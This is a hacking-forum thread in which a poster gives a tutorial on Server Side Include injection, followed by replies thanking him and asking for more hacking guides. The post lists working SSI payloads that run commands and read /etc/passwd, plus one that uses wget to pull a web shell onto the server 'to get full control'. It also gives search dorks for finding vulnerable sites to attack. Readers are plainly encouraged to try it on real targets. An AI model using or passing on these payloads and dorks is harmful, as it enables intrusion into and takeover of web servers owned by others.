iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Server Side Includes
  • Xin
    Posts: 3,251
    Server Side Includes

    What is It?
    A Server Side Include Attack is an Extremely Useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know what commands could help compromise the server to do this.

    What Sites are Vulnerable?
    For a site to be vulnerable to SSI Injection, Apache needs Server Side Includes aloud in the config file or the file extention must end in '.shtml' '.shtm' or '.stm' both Apache, lighthttpd and IIS support SSI.

    Testing for SSI Injection
    To audit a site to check if it is vulnerable to SSI Injection you search all the directories for '.shtml' '.shtm' or '.stm' extentions, if you find any then its probably enabled, if you dont find any it still may be enabled. It effects pages with unsanitized requests, (eg no filters, filtering < !--#exec ...-->) To test you enter the following command into the request 
    &lt; !--#exec cmd=\"ls\" --&gt;
    If you get a filesystem output appear then it is vulnerable, if the server is Windows replace the 'ls' for 'dir'
    You test for SSI the same way as XSS, you can post the command into
    - Textboxes/search boxes
    - Headers
    - Cookies
    - Address Bar

    Useful Commands

    Show Files Linux
    &lt; !--#exec cmd=\"ls\" --&gt;

    Show Files Windows
    &lt; !--#exec cmd=\"dir\" --&gt;


    Read /etc/passwd 
    &lt;!--#include virtual=\"/etc/passwd\" --&gt;


    What User Is the webserver running on
    &lt; !--#exec cmd=\"whoami\" --&gt;

    Download a shell to the server to get full control
    &lt; !--#exec cmd=\"wget \"shell&#46;php\"\" --&gt;


    Dorks
    Simillar to SQLi dorks, they get a list of sites that may or may not be vulnerable to SSI Injection
    inurl:index.shtml
    inurl:index.shtm
    inurl:index.stm
    Theres a few to start you off, but it is easy as pie to think of your own.
    Xin
  • lonleycrow
    Posts: 24
    Where you learned all this stuff?
    I need to read a lot from you
  • ikaw
    Posts: 25
    what the... Im gonna start living to this forum! please, tell us a lot more that you have learned.. Im gonna try this one! :p
  • Xin
    Posts: 3,251
    Glad you liked it ikaw :)
    Xin
  • no17
    Posts: 54
    Thanks in advance
  • Bursihido
    Posts: 406
    thanks in advanced



    toosshrrt
  • [Deleted User]
    Posts: 0
    Looking forward to reading , thanks in advance.
  • Xin
    Posts: 3,251
    Hope you guys liked it :)
    Xin
  • Xin
    Posts: 3,251
    Improved article, as it was pretty small originally.
    Xin
  • _st4ck3D*
    Posts: 83
    Well done written.
    Write one for RCE too ; )
  • Sh3llc0d3
    Posts: 1,910
    Definitely interesting stuff, you really know your stuff on web app's!
  • alix10
    Posts: 73
    good one Xin, can you post a guide on how to fully hack a site with ssl ? Please..
  • Xin
    Posts: 3,251
    said:


    good one Xin, can you post a guide on how to fully hack a site with ssl ? Please..



    Methods to hack a site with SSL is the same as without, its only a form of encrypting data to and from the server, its not extra protection
    Xin
Add a Comment